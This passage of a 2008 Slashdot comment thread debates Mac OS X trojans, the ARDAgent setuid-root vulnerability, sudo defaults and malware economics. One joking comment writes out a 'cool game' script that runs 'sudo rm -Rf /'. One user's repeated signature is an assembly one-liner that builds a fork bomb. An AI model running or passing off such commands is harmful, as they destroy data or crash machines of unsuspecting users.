  Most people went along with the joke and just posted Xs. However, some people actually posted their real SSN (and then complained about how they couldn't remove the post).
  As my father always said, "Stupidity is always terminal."
49. Re:Proof of Concept Slashdot Trojan by TClevenger · 2008-06-25 04:47 · Score: 1
  
  And change the combination on my luggage!
50. Re:Proof of Concept Slashdot Trojan by AzureDiamond · 2008-06-25 04:52 · Score: 1
  
  Really? I didn't know that! Nice to know just in case I accidentally type hunter2 sometime, I'm glad /. has my back!
51. Re:Proof of Concept Slashdot Trojan by kestasjk · 2008-06-25 05:12 · Score: 1
  
  Yes, Arty McStrawman does believe that his Mac is invincible. Not many beside him do, though. This doesn't really work when I was responding directly to "Arty McStrawman"..
  Also, if you already know what will people respond to you, why do you ask your, fairly inflammatory, I might add, question, even if you intended it to be a rhetorical one? Because it is a real vulnerability, despite being local. I've been told by "Arty McStrawman" that local vulnerabilities don't count many times on /. before, and didn't want to have to respond to it yet again.
  
  --
  // MD_Update(&m,buf,j);
52. Re:Proof of Concept Slashdot Trojan by kestasjk · 2008-06-25 05:16 · Score: 1
  
  Because the ARDAgent vulnerability is really easy to patch... you can easily do it yourself and I'm sure Apple will have a patch any day. Gee, that's reassuring..
  
  --
  // MD_Update(&m,buf,j);
53. Re:Proof of Concept Slashdot Trojan by inerlogic · 2008-06-25 05:30 · Score: 1
  
  the mac! she's gone from suck to blow!
54. Re:Proof of Concept Slashdot Trojan by konohitowa · 2008-06-25 05:33 · Score: 1
  
  Slashdot modding at it's best. The PP points out that the ARDAgent doesn't work on a fair number of systems and then responds with a reverse paraphrasing of the GP. The PP gets Flamebait. The GP gets insightful. How delicious.
  Seriously. Why haven't they corrected the modding system around here? It really wouldn't be terribly difficult. If you could only mod up and the descriptions were merely tags and didn't account for plus or minus, things would be much better. The filtering system would need some changes too - like filtering by % score.
55. Re:Proof of Concept Slashdot Trojan by Amisinthe · 2008-06-25 05:37 · Score: 1
  
  There was a separate article discussing the ARDA vulnerability a few days ago if I recall. Also, and I think there was much argument about this, the perpetrator has to have physical access to the machine at some point, which makes the vulnerability almost not worth mentioning.
  
  Also, no one thinks Apple is invulnerable, there are just some basic security measures in place that work very well. As a Mac user, behind a firewall, I don't worry about anything*. And I won't until I have a good reason to.
  
  Of course, I still worry about e-mail phishing scams, but those are platform independent anyway, and even non-tech savvy people can be taught how to avoid them.
56. Re:Proof of Concept Slashdot Trojan by Hal_Porter · 2008-06-25 05:50 · Score: 1
  
  Uhh, no actually, your story did not clear anything up at all
  Consider rutting ungulates or lekking in other species. What effect does a subordinate bragging have on the alpha male status of the boss or the desired alpha male status of internet trolls.
  
  --
  echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
57. Re:Proof of Concept Slashdot Trojan by konohitowa · 2008-06-25 05:52 · Score: 1
  
  Okay - well - the GP turned itself to flamebait too. That doesn't change my basic objection. Even in the numbers...
  Currently (as I write this), the GP is 40% flamebait, 40% insightful, and 10% troll - and yet it shows as Flamebait.
  The PP is 30% informative, 20% insightful, and 50% flamebait. And it also shows as Flamebait.
  So, 2 out of 5 mods thought the GP was a worthwhile read, and fully half of mods thought the PP was a worthwhile read.
  About the only saving grace is that I can +6 filter flamebait, troll, and offtopic. Of course, that also means I get the latest turd-eating update at the front of most threads.
58. Re:Proof of Concept Slashdot Trojan by Hal_Porter · 2008-06-25 05:55 · Score: 1
  
  YOU WILL OBEY ME!
  
  --
  echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
59. Re:Proof of Concept Slashdot Trojan by AzureDiamond · 2008-06-25 05:57 · Score: 1
  
  I will obey you, Master.
60. Re:Proof of Concept Slashdot Trojan by Hal_Porter · 2008-06-25 06:01 · Score: 1
  
  Excellent!
  
  --
  echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
61. Re:Proof of Concept Slashdot Trojan by clang_jangle · 2008-06-25 06:32 · Score: 1
  
  I wouldn't sweat it. Slashdot has always been comically irrational that way, it's part of the charm. I'm still looking forward to my first "+5 Troll" mod.
  
  Also I'm sure we Apple users are accustomed to the haters on /., though I've never really understood them. It's just a fact that if you defend an Apple product some jackasses will mod you down, no matter how factual your information. You can really see their desperation in the rush to report every little blog post in which some "security software" producer claims to have found an OS X issue. I guess the real news is that with so many people switching to Mac or Linux the anti-malware dog-and-pony show operators find their market dwindling, but apparently the Mac haters wouldn't want to look at that. Of course many of them are probably foolish enough to actually tie up half their system resources running antivirus software, as if it will help. Superstitious people are not usually terribly bright. Oh well, sucks to be them.
  
  Meanwhile, laughably incorrect reporting aside -- still no malware in the wild for OS X. Ha Ha! :)
  
  P.S. Now that was a proper demonstration of flamebait!
  
  --
  Caveat Utilitor
62. Re:Proof of Concept Slashdot Trojan by prockcore · 2008-06-25 08:17 · Score: 1
  
  You laugh, but I was once burned by the guy who has the 2 Replies Beneath Your Threshold" as his signature. Of course I only got hit by it once.
63. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-26 00:02 · Score: 0
  
  Congratulations, you have been successfully trolled. Those who post the 'actual' SSN and then complain about not being able to remove it are joking in the exact same way those who post the X's are. L24chan
  
  Are you sure it wasnt "Stupidity is hereditary" your father always said, usually before trying to lick his ear?
64. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-27 08:19 · Score: 0
  
  poop
65. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-29 13:30 · Score: 0
  
  While you're at it, also fix the bug that keeps telling me to try again even though the CAPCHA is correct because it thinks I'm a script for some reason. There doesn't seem to be any standard waiting period and I've lost a lot of posts that way.
Lame by grusin · 2008-06-24 19:49 · Score: 5, Funny

On windows they do that without asking for password
1. Re:Lame by ACMENEWSLLC · 2008-06-25 05:12 · Score: 1
  
  My father's Pc just got killed off by one of these. He was watching a video of a Jaguar for sale on eBay. Of course, they provided the necessary codec too. This resulted in Antivirus XP 2008 getting installed (malware) and they put the PC in a continual BSOD loop.
2. Re:Lame by Anonymous Coward · 2008-06-25 11:25 · Score: 0
  
  The whole point of the article is they can now do this on your Mac without asking for your password too thanks to ARD.
Third trojan by isorox · 2008-06-24 19:51 · Score: 0

echo "#!/bin/bash" > coolGame.sh
echo "sudo rm -Rf /" >> coolGame.sh
Cool MAC OSX game!
1. Re:Third trojan by pandrijeczko · 2008-06-24 20:23 · Score: 0
  
  I think you'll find that only a complete idiot would allow "sudo" access to "rm" such that it runs with root permissions. I don't use Ubuntu much (which does a lot via "sudo" by default) but would be very surprised if such a glaring security hole existed on it. You need to remember that the operation of "sudo" is controlled by a configuration file which, by default, is usually quite locked down.
  
  --
  Gentoo Linux - another day, another USE flag.
2. Re:Third trojan by Anonymous Coward · 2008-06-24 20:44 · Score: 1, Insightful
  
  Not on Ubuntu - the sudo command in the grandparent will still do the usual rm -rf /
  Consider that a lot of people running ubuntu (myself incuded) would be the only users on the machines, and as such would be in the admin group. This means that effectively the same person and same password is used for both normal activities and sysadmin activities.
3. Re:Third trojan by pandrijeczko · 2008-06-24 21:02 · Score: 1
  
  I'm not trying to be clever here but if that's the case then I strongly recommend you change that configuration. You may well be as experienced a UNIX/Linux user as I am but even I only ever drop to root permissions when I absolutely need to.
  To be perfectly honest with you, if you use a Linux PC as a file server (like I do) such that there are occasions when you need to delete a directory in "one hit" using rm -Rf, then you're much better off changing the ownership of those files to you first and just tightening up NFS or SAMBA (depending on how you make those files available over the LAN).
  
  --
  Gentoo Linux - another day, another USE flag.
4. Re:Third trojan by isorox · 2008-06-24 23:05 · Score: 1
  
  I think you'll find that only a complete idiot would allow "sudo" access to "rm" such that it runs with root permissions. That's the default for our test OSX laptop
5. Re:Third trojan by ohcrapitssteve · 2008-06-24 23:54 · Score: 1
  
  On the two major used-by-many operating systems that do a lot via sudo (Mac OS X and Ubuntu flavors) the user created at OS setup is given sudoer rights right off the bat.
  
  I know some bright OS X users, but only a handful of them could explain to you what sudo does.
6. Re:Third trojan by pandrijeczko · 2008-06-25 01:43 · Score: 1
  
  I can't comment, I actually know of nobody that uses OS X - but that's an aside.
  However, I do accept that "sudo" can have a use in true multi-user environments but I suspect Ubuntu and OS X are mostly run by single users who have both a normal and root account on their systems. In that specific scenario, using "sudo" seems a little pointless to me as it's probably more use to better understand the pitfalls of using root if you hit the wrong key rather than worrying about configuring "sudo" to cover all the bases when it comes to not letting you do everything at root.
  
  --
  Gentoo Linux - another day, another USE flag.
Apple spin by Centurix · 2008-06-24 19:51 · Score: 3, Funny

iTrojan, custom trojan, personally designed by Steve Jobs' evil twin Rodney Jobs, the UI would be beautiful, white, sterile. Mass infection through Starbucks WiFi.

--
Task Mangler
1. Re:Apple spin by doyoulikeworms · 2008-06-24 20:57 · Score: 5, Funny
  
  iTrojan - It just works.
2. Re:Apple spin by Anonymous Coward · 2008-06-24 23:11 · Score: 0
  
  Then we could have the iSex that the iTrojan would protect against
3. Re:Apple spin by Anonymous Coward · 2008-06-24 23:25 · Score: 0
  
  *boom* ?
4. Re:Apple spin by AioKits · 2008-06-25 00:49 · Score: 2, Funny
  
  By chance, does Rodney Jobs have a goatee?
  
  --
  "Quote me as saying I was mis-quoted." -Groucho Marx
5. Re:Apple spin by Wisconsingod · 2008-06-25 01:18 · Score: 1
  
  iTrojan - America's most trusted virus
6. Re:Apple spin by Anonymous Coward · 2008-06-25 02:10 · Score: 0
  
  I was using an iTrojan last Halloween, the damn thing split, and now I have iPods everywhere!
7. Re:Apple spin by neomunk · 2008-06-25 02:19 · Score: 2, Funny
  
  pssst; iSex is called "cyber" and there is NO protection that will stop your 19 y/o female bisexual cheerleader cyber-partner from turning back into the male 45 y/o laid-off McDonald's manager when "she's" done.
8. Re:Apple spin by Mr.+Vage · 2008-06-25 03:30 · Score: 1
  
  Yeah, but only with the overpriced iLube. I tried using my cheaper, better nVidia 9800Glide+ and my Logilube MX518...
  I hope Apple has a 9 month return policy.
Yawn by rsmith-mac · 2008-06-24 19:56 · Score: 5, Insightful

We go through this about twice a year with the same results every time. "Someone" releases a trojan, presumably as proof that Mac OS X has security holes. Then everyone gets whipped in a frenzy and ultimately no one is infected by the damn thing in the first place. Mac OS X does have its holes (some of which are quite unreasonable), but trying to scare the users (in to buying anti-virus software, perhaps?) gets tiring after a while. No one has yet to do anything that matters with these trojans and security vulnerabilities, the real troublemakers continue to target Windows.

Mac OS X's day will definitely come at some point, but if people keep crying wolf every time someone whips up a theoretical and entirely implausible situation, no one is going to believe the security community once some black-hat does finally decide to attack the Macs.
1. Re:Yawn by kirbysuperstar · 2008-06-24 20:09 · Score: 1
  
  We go through this about twice a year with the same results every time. "Someone" releases a trojan, presumably as proof that Mac OS X has security holes. Then everyone gets whipped in a frenzy and ultimately no one is infected by the damn thing in the first place. Is that because no-one gives a crap in the first place?
2. Re:Yawn by tibman · 2008-06-24 20:12 · Score: 3, Insightful
  
  The poker game trojan sounds pretty lame too. The program must be downloaded and run first which pops open a quasi-phishing "error: type your password here to fix" message. Infection vectors seem key to how fast these things spread. Having a file mac users have to manually download first is slow/weak and i doubt the downloaded file would be manually copied to another machine and run.
  
  --
  http://soylentnews.org/~tibman
3. Re:Yawn by KGIII · 2008-06-24 20:26 · Score: 5, Interesting
  
  At risk of being called a troll... The adage does actually apply but I will spell it out a bit. If you're going to attack then your goal is to do as much damage as you can as efficiently as you can. The vast majority of users are still using Windows. The vast majority of business data is still being transported on Windows based machines. You are as unlikely to find mass-effect malware for a Mac as you are for RiscOS, Amiga, Solaris, BSD, or Linux. The ends don't justify the means from a realistic view and if anyone thinks that malware authors are out there doing it just to "show the man" or for "fame" these days hasn't actually paid attention to the malware scene for the past five years. Today it is about blended threats, specific highly targeted attacks, gaining information as opposed to causing destruction and the goal isn't geekiness nor fame but rather is about money. Mac users are just as likely to type in their password as are Windows users. (As *NIX is not aimed at the mainstream I'd argue that *NIX users are less likely to do so, and yes, I use all the above OSes when required or have used them to play with them.)
  
  --
  "So long and thanks for all the fish."
4. Re:Yawn by Simon+(S2) · 2008-06-24 20:31 · Score: 2, Insightful
  
  I completely agree with you, and I too think that Mac OS X's day will definitely come at some point, and that will be the time Mac has a bit more market share. At the time being it just doesn't make sense to write a large scale virus/spambot/trojan for the mac platform.
  But anyway, just to know that a Trojan is "possible" on the mac should make the mac users aware that if someone targets their machine they are just as vulnerable as a windows user (executing untrusted code locally is just bad on any platform).
  
  --
  I just don't trust anything that bleeds for five days and doesn't die.
5. Re:Yawn by mentaldingo · 2008-06-24 20:44 · Score: 2, Insightful
  
  I think the point of TFA was to show that these things aren't theoretical and "implausible". Security isn't just about viruses: even if your so-called "troublemaker" virus-writers mostly target Windows machines, if there is a bounty on your Mac, it would be easy for someone to root it (in fact, some parts of the hack would be easier than on windows!).
6. Re:Yawn by Anonymous Coward · 2008-06-24 20:44 · Score: 0
  
  Well eventually it might happen that a 0-day spreads, affecting a large number of OSX boxes. It still has to happen many other times for at least 10 years, and it must lead to the creation of an AV industry for the mac to which each user must necessarily relate. Then we can rightfully compare the OSX experience to the windows one.
7. Re:Yawn by marcello_dl · 2008-06-24 20:47 · Score: 5, Insightful
  
  Except that worms for linux would find most servers on the net vulnerable- do you realize the potential for mischief?
  In fact worms for linux were produced.
  
  --
  ---- MISSING MISCELLANEOUS DATA SEGMENT --- [sigdash] trolololol
8. Re:Yawn by mentaldingo · 2008-06-24 20:47 · Score: 1
  
  That's not true. There will be only a small market for trojans/spambots/viruses for Macs, but so far this market is largely uncatered to (or at least that's the impression I get). There would be a larger incentive for malware-writers to target OS X than Windows (where it'd be "just another" piece of malware with a tiny market share) because of this.
9. Re:Yawn by rolfwind · 2008-06-24 20:56 · Score: 1, Insightful
  
  Mac OS X's day will definitely come at some point, but if people keep crying wolf every time someone whips up a theoretical and entirely implausible situation, no one is going to believe the security community once some black-hat does finally decide to attack the Macs.
  How sure are you of that proposition? Not that I think OS X is invulnerable, but perhaps OS X isn't attacked, not because of Marketshare but because Windows is just much easier. Afterall, I don't hear people chiming the Linux bell so much in this area even though it is being sold commercially now (gPC, eeePC, etc.) and the two are built on a similiar base:
  http://www.roughlydrafted.com/2008/04/01/the-unavoidable-malware-myth-why-apple-wont-inherit-microsofts-malware-crown/
  I'm pretty sure most of MS's attacks come from it supporting legacy apps and legacy cruft and not letting go (like the damned Registry). One thing Apple never had a problem with. Linux neither in many areas.
10. Re:Yawn by ya+really · 2008-06-24 20:59 · Score: 1
  
  I've come to think that viruses for Apple OS are only released to prove the statement, "Just because you're a virgin and live alone on a desert island, doesn't guarantee you wont get an STD." Now how exactly would you contract it? I'm not quite sure. Maybe a boat of Tahiitian hookers shipwrecks on the island? I guess it keeps Apple from gloating it's OS can't be compromised and keeps the coders on their toes, since everyone knows security through obscurity doesn't work.
11. Re:Yawn by dhavleak · 2008-06-24 21:17 · Score: 0
  
  Dude -- please, for the love of god, tell me you don't believe the propaganda on roughly drafted (Daniel Eran Dilger's site).
  The motive behind malware is the same as any other commercial software -- commerce (just in a different form). The malware authors make money either by getting personal info (identity theft) or by creating bot clusters -- the bot clusters are generally used to threaten some company with a DOS attack if they don't cough up dough (blackmail essentially).
  Now that being the case, if Windows has 93% marketshare, OS-X 6%, and Linux 1% -- what platform will you choose to attack? The equation is changing for OS-X as Mac sales have been on fire for some time now, and that's why malware authors are (very slowly) starting to target it as well. It will still be some time before their share really grabs malware author's attentions, but is certainly no longer wise for OS-X users to assume they are 'automatically safe' because of their OS choice.
12. Re:Yawn by Anonymous Coward · 2008-06-24 21:19 · Score: 0
  
  And server have soemthing called an administrator monitoring them usually
  Play again zealot troll when you will understand popular does not mean 'signifiant percentage' but FUCKING HUGE NUMBERS...
  the amount of linux server compared to the amout of windows client on the net is nil.
13. Re:Yawn by Anonymous Coward · 2008-06-24 21:24 · Score: 0
  
  Hmm...attack linux servers (most profitable would be banks) who are trying their hardest to prevent you from hacking them, or attack home Windows users (to steal identities AND bank accounts AND plant botnets) who wouldn't have a clue how to stop you in the first place? Tough choice.
14. Re:Yawn by aaaaaaargh! · 2008-06-24 21:48 · Score: 1
  
  As far as I can see, the only reason Macs haven't suffered from trojans and viruses so far is that the user base is not interested in writing them and that the really evil malware writers know nothing about OS X. This can change any day.
  Here is a little anecdote to illustrate how serious Apple takes security: It took them almost two years to fix a bug in OS X 10.3 that would allow an attacker to extract the password of a file vault account from the swap file. The bug was fixed in a paid upgrade to 10.4 and all they came up with was encrypted swap, which is not the best solution. Why didn't they lock the memory to prevent it from being swapped in the first place?
  Since this incident, I personally believe that they intentionally leave security holes open.
15. Re:Yawn by Tim+C · 2008-06-24 21:50 · Score: 4, Insightful
  
  Do you have any figures to back that claim up? Most servers are looked after by admins, and any admin worth their salt will at least put their machines behind a firewall, opening up only those ports that are absolutely necessary.
  Yes, some will be vulnerable, but as another poster points out the number will be utterly insignificant compared to the number of networked clients running Windows. The target simply isn't big enough to be worth the effort.
  
  --
  It's official. Most of you are morons.
16. Re:Yawn by Admiral+Ag · 2008-06-24 22:18 · Score: 1
  
  It's not that simple. If you want to attack ordinary people using their home machines (to get their credit card details and so on) attacking OS X would be a reasonably good idea. Everyone has seen those surveys which demonstrate that Mac owners tend to be wealthier than other computer users. Attacking Macs to make spambots, not so much.
  It's been 7 years now without any significant threats in the wild for OS X. That's pretty good going.
  
  --
  "by that I mean people who don't sit on slashdot all day wondering why everyone else isn't building robots" DECS
17. Re:Yawn by Admiral+Ag · 2008-06-24 22:25 · Score: 4, Funny
  
  "Maybe a boat of Tahiitian hookers shipwrecks on the island?"
  So you're the guy with the device that can read my dreams. Please stop.
  
  --
  "by that I mean people who don't sit on slashdot all day wondering why everyone else isn't building robots" DECS
18. Re:Yawn by GigaplexNZ · 2008-06-24 22:47 · Score: 2, Insightful
  
  where it'd be "just another" piece of malware with a tiny market share You seem to be under the impression that a Windows box can only have one piece of malware installed at a time. This is simply not true.
19. Re:Yawn by flnca · 2008-06-24 23:01 · Score: 1
  
  once some black-hat does finally decide to attack the Macs Unfortunately, there are already hundreds of Mac viruses. I have some super-spammed e-mail accounts, that get hundreds of infected e-mails per day, and more often than not, viruses come with ".hpx" extensions and other MacOS file extensions. Ignoring these threats could have severe consequences for a Mac user, if they would click on such file.
  
  Someone could say "yeah ... but MacOS X is a Unix system, so the threat would be limited to the current user", but one should remember that MacOS X has a heavily modified BSD kernel, and custom executable formats that have some quirks. There is (or was) some well-known vulnerability in the executable file format.
20. Re:Yawn by mentaldingo · 2008-06-24 23:10 · Score: 1
  
  That's not what I meant. Competition for malware on Windows will be greater, driving the price down. There is less (if any) commercial malware on the mac and so competition will be less intense and prices higher. Mac malware writers would earn more money.
21. Re:Yawn by flnca · 2008-06-24 23:12 · Score: 1
  
  And server have soemthing called an administrator monitoring them usually It depends entirely on the quality of the administrator if s/he is able to detect and/or fend off threats.
  the amount of linux server compared to the amout of windows client on the net is nil. That's true in principle, but just one infected server can infect all clients. It's no problem to write a virus that goes from a Windows client to a Linux server, and from there, to other Windows clients. An infected server (if it's a mail server, for instance) can send infected spam e-mail to all the mailboxes easily. An infected web server is even more dangerous, since it can serve infected web pages to Windows clients.
  
  Linux server components are constantly being checked for vulnerabilities, but the "sendmail"-craze in the 90ies has shown that vulnerabilities in server software can have dire consequences. Just one exploited vulnerability can affect whole corporate networks. It doesn't help that some admins refuse to update their Un*x systems (because, sometimes, that's a lot of work). Automatic update features can alleviate that somewhat, if they're indeed being used.
22. Re:Yawn by flnca · 2008-06-24 23:20 · Score: 1
  
  Some protocols reveal the version (and host platform) of the server software. This information can be used to write specialized viruses that exploits security holes in those protocols. One example of this was the "sendmail" program that was used as a mail server program for a long time. Breaking in was done using the SMTP protocol. So, just by sending an e-mail to such a server, it was possible to break in. If the admin doesn't know about these vulnerabilities, then all sorts of trouble can ensue. (many companies feel content with employing relatively unskilled admins)
23. Re:Yawn by Anonymous Coward · 2008-06-24 23:21 · Score: 0
  
  Macs don't have critical mass yet to support viruses. There needs to be sufficient numbers of them in order to spread and have a semidecent shot at surviveing. Even if it try to infect another machine it only has a what, 5% chance of even hitting another mac? much less one with the particular vulnerability.
  Windows machines you have a good 90%+ chance of hitting another windows machine and much better odds at finding one with the vulnerability. Even if a patch is released on windows and 90% of people patch you STILL have more vulnerable systems than if 100% of macs had the vulnerability open.
24. Re:Yawn by flnca · 2008-06-24 23:26 · Score: 1
  
  Mac viruses already make up a significant percentage of spam mail in my mailboxes (.hpx files and other fun stuff). To be blind to such threats is simply irresponsible, methinks.
25. Re:Yawn by INT_QRK · 2008-06-24 23:59 · Score: 2, Insightful
  
  Your allusion to anti-virus software calls to mind a serious question that's been on my mind for some time. Since computer security software (anti-virus, anti-spyware, HIDS, NIDS, etc.) is relied upon by not only to protect consumers, but industry, government, and virtually every other institution of our society, how is it not considered Critical Infrastructure, subject to government monitoring, regulation, testing, or standards of conduct and performance? I'm curious, because installing such products seems to pose a real dilemma. They insert themselves often with the root level access, call home constantly, frequently inject code onto your system without operator visibility or intervention in various forms including updated "signature files," not to mention their own patch updates, and how can one assess what activity they allow, disallow, ignore, or accept since their code and algorithms are proprietary and trade secrets? Were I a well resourced adversary, might I not consider buying into (or infiltrating) a major institutional security software provider so that I could use it to spread my own root-kit? I may want my known performance to be otherwise impeccable, of course, to increase my market penetration, so that I could choose when and where to facilitate targeted malicious activity. I sure hope DHS, or somebody, is thinking about this.
26. Re:Yawn by Lars+T. · 2008-06-25 00:05 · Score: 1
  
  Now that being the case, if Windows has 93% marketshare, OS-X 6%, and Linux 1% -- what platform will you choose to attack? Let's put it this way - thanks god the malware authors have the same business acumen as you.
  
  --
  Lars T.
  To the guy who modded me down from perfect to terrible Karma - Apple haters still suck
27. Re:Yawn by MickDownUnder · 2008-06-25 00:12 · Score: 3, Interesting
  
  You're almost right, but not quite.
  Today there is government backing behind state of the art malware, and it is a lot more sophisticated than you give it credit for. Todays black hats are guns for hire, owning vast botnets, often they are only loosely affiliated with government agencies.
  The effectiveness of botnets is primarily measured by their ability to infiltrate and function WITHOUT doing any detectable harm. The vast percentage of compromised machines are dormant, and do NO HARM, they are only a very occasionally test fired to assess their operational status.
  The primary purpose of botnets is NOT monetary, it is political. They are rarely used to directly make money.
  Just take a look at what happened to Estonia for example...
  http://www.guardian.co.uk/world/2007/may/17/topstories3.russia [guardian.co.uk]
  Back in the 60's when the components that make up the internet were designed, the main concern was designing a network of computers that could communicate even when under attack during a time of war. Today governments have the exact opposite concern.
  The only defense mechanisms that work against todays malware are distributed ones, short of disconnecting themselves from the internet, individuals have no hope, you just simply won't suspect the mechanism that will be used to comprimise your machine.
  This is something white hats are only just coming to grips with.
  Todays hackers will be looking to gain deep penetration into aspiring OS platforms as early as they possibly can, to ensure they are in there from day one. Macs are easily popular enough to attract the interest of black hats, if you're on any machine directly or indirectly connected to the internet you should be worried about malware, Macs are definitely not immue.
28. Re:Yawn by Tom · 2008-06-25 00:18 · Score: 5, Insightful
  
  Mac users are just as likely to type in their password as are Windows users. Evidence for that claim?
  Mac's "I need your password" dialog is better done and, more importantly, a lot less common than windos UAC. As such, most Mac users don't roll their eyes and mutter "get on with it already, moron" when it pops up. In fact, when it pops up, I either expected it to, or it surprises me enough that I actually read what it's about.
  
  --
  Assorted stuff I do sometimes: Lemuria.org
29. Re:Yawn by JPRelph · 2008-06-25 00:30 · Score: 1
  
  Any viruses with a .hqx extension are likely to be Mac OS 9 and below viruses (ie Classic) that literally won't run at all on current Macs. There were viruses for Classic Mac OS but I'm unaware of any "real" viruses (ie not trojans or the few proof of concepts) for OS X. Certainly nothing that could be classed as a significant threat, not saying that there aren't issues with OS X (it always amazed me that InputManagers were never really targetted), just that there hasn't really been any seriously weaponised virus for OS X. Not yet at least.
30. Re:Yawn by dhavleak · 2008-06-25 00:48 · Score: 1
  
  Everyone has seen those surveys which demonstrate that Mac owners tend to be wealthier than other computer users. They would have to be fifteen times wealthier than PC users to make up the difference. Or OS-X would have to require fifteen times less man-hours per exploit, for it to be worth developing exploits on it. (or some combination thereof, but you get the picture).
31. Re:Yawn by stewbacca · 2008-06-25 01:36 · Score: 1
  
  if Windows has 93% marketshare, OS-X 6%, and Linux 1% -- what platform will you choose to attack? If I were a dirt-bag, scum-bucket hacker type, I'd probably really hate Macs and thus, try to attack those because of my out-of-proportion hatred towards Hipsters and Shiny Things.
32. Re:Yawn by Poltras · 2008-06-25 01:45 · Score: 3, Insightful
  
  Hahaha! Have you met admins in real life? Most are incompetent, overpaid screen-lookers. I've met some that didn't know what TCP meant. A lot of them didn't care about opening only the necessary outbound ports, just inbound. And then, when you point out it's a software firewall, they can't see why the difference is important...
  
  This made me very sad, and I stopped working in security. I came to the true realization that demolishing a moron's bad work only made the moron build it back exactly where it was. Lazy admins don't fix vulnerability, they make the path around them.
  
  Disclaimer: I've met some brilliant admins in this world. Unfortunately, they were only a handful.
  
  --
  Of Code And Men
33. Re:Yawn by Colonel+Korn · 2008-06-25 01:56 · Score: 1
  
  How sure are you of that proposition? Not that I think OS X is invulnerable, but perhaps OS X isn't attacked, not because of Marketshare but because Windows is just much easier. Remember the results of the hacking contest a few months ago showing that OSX was the easiest OS to compromise.
  
  --
  "I zero-index my hamsters" - Willtor (147206)
34. Re:Yawn by drinkypoo · 2008-06-25 01:59 · Score: 1
  
  Speaking as an Ubuntu user, I get seriously annoyed by the frequency of password prompt on the mac. The most annoyed I get on Ubuntu is when I'm opening and closing terminal tabs and I have to keep passwording to sudo... but the graphic sudo seems to be pretty good. Lately there's been a trend to have unlock buttons in gnome, kind of sad. I liked it much better the old way where you were either root or not. Ideally it would just prompt you if you tried to change a setting that required more access, and I'd hope there'd be more fine-grained access. Capabilities now!
  
  --
  "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
35. Re:Yawn by jcgf · 2008-06-25 02:10 · Score: 1
  
  I'll stop using mine if you promise to stop dreaming about me.
36. Re:Yawn by Penguinisto · 2008-06-25 02:10 · Score: 2, Insightful
  
  While the last one died off in ~2001 or so, yes, there were worms created with the intention of targeting Linux.
  
  Also, I wouldn't be so quick to say that all Linux machinery are looked after by professional, competent admins, either - between the expanding desktop user base and the fact that I've seen a disturbing number of incompetent admins (even where I work)? It's not that easy to dismiss.
  
  That said, on balance Linux is a hell of a lot harder to bust into (not PHP, Linux) than a typical Windows box of any type.
  /P
  
  --
  Quo usque tandem abutere, Nimbus, patientia nostra?
37. Re:Yawn by Penguinisto · 2008-06-25 02:15 · Score: 1
  
  As an owner of two Macs (well, one's a Hackintosh), I'm just not going to move to be afraid - at least until I see something that doesn't require me to tie half my brain behind my back first.
  
  It's one thing to have something out there that can get into your machine without your knowledge or consent - those are to be respected.
  
  It's another entirely to have trojans (which are present for any OS in active use, really) - these require you to willfully participate in their propagation.
  
  Anyone pushing for fear against the latter are spreading FUD, pure and simple.
  /P
  
  --
  Quo usque tandem abutere, Nimbus, patientia nostra?
38. Re:Yawn by galego · 2008-06-25 02:19 · Score: 1
  
  I would agree. At the same time, since botnet's and taking over zombie computers are all businesses now, it stands to reason that the Mac's growing popularity (especially amongst naive college students), there will be some 'investment' in 'future markets', if you will. I'm certain there's some organized crime crackers being paid to investigate cracks for the Mac that don't require at-the-console-with-an-admin-password type exploits.
  I have long worked with Mac's and have been pleased to know that there are no known worm's etc. "in the wild" (Yes, that is a fact, although not proof of invincibility).
  That all said ... I still live with some paranoia, use a limited permissions user as my main account .. etc. etc.
  
  --
  Que Deus te de em dobro o que me desejas
  [May God give you double that which you wish for me]
39. Re:Yawn by Aram+Fingal · 2008-06-25 02:39 · Score: 4, Insightful
  
  I have been one of the first to point out the same thing in each of these past cases but this is different. We have a scriptable application setuid to root. That's an obvious vulnerability on a sliver platter. What was Apple thinking?
40. Re:Yawn by Aram+Fingal · 2008-06-25 02:45 · Score: 3, Informative
  
  A few years ago, we had a situation where attackers were scanning the net to find machines running Irix (Silicon Graphics UNIX) because they were easy to break into. Attackers go after easy targets, not necessarily common targets.
41. Re:Yawn by Aram+Fingal · 2008-06-25 02:57 · Score: 1
  
  Note that the screen shot of the poker trojan shows that the password dialog only has an "OK" button. There is no cancel. Some fraction of users are going to put in their password just because they don't see any other way to get rid of the dialog box. I've seen users do stuff like that before.
42. Re:Yawn by Tom · 2008-06-25 03:25 · Score: 3, Insightful
  
  Speaking as an Ubuntu user, I get seriously annoyed by the frequency of password prompt on the mac. What are you doing? I regularily go for many days without seing that prompt at all, unless you count the login screen.
  
  --
  Assorted stuff I do sometimes: Lemuria.org
43. Re:Yawn by phantomfive · 2008-06-25 03:33 · Score: 4, Interesting
  
  The primary purpose of botnets is NOT monetary, it is political. They are rarely used to directly make money. Woah, you are way off base on this one, and I refer to Misha Glenny, his book where he investigates global hacking schemes.
  
  Even if you think of it, the potential for profit is just too great. If you can harvest 20,000 credit cards, and only take $5 from each one (call it a service charge or something), will the people notice? If you can do it with 20,000, why not a million? Can you not imagine that this would be tempting to people? It is. Horribly tempting.
  
  Another example we had on slashdot here a few years ago was a story about botnets being used to DDOS offshore gambling sites, and then ask extortion money to stop the attack. Here, check it out. There are many ways to make money with a botnet. Of course spam is another common way. Hacking is big business.
  
  --
  Qxe4
44. Re:Yawn by 99BottlesOfBeerInMyF · 2008-06-25 04:03 · Score: 1
  
  We go through this about twice a year with the same results every time. "Someone" releases a trojan, presumably as proof that Mac OS X has security holes.
  Except in this case, that's not the only thing that has happened. Supposedly, Intego has found a trojan in the wild, which is very rare. It's not a very good trojan and we don't know how widespread or if Intego's claims about the quality are verifiable. This may be scare mongering, but at least it has a little more meat to it than a purely academic proof of concept does.
45. Re:Yawn by NtroP · 2008-06-25 04:41 · Score: 2, Informative
  
